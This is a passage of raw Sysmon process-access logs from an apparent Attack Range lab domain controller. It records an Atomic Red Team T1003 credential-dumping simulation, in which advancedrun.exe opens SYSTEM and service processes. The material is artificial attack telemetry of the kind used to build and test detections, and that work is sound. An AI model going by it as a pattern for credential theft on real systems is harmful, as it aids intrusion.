ll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952119Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952118Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952117Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952116Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952115Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952114Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952113Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952112Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952111Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952110Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952109Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952108Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952107Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952106Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952105Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952074Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952073Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C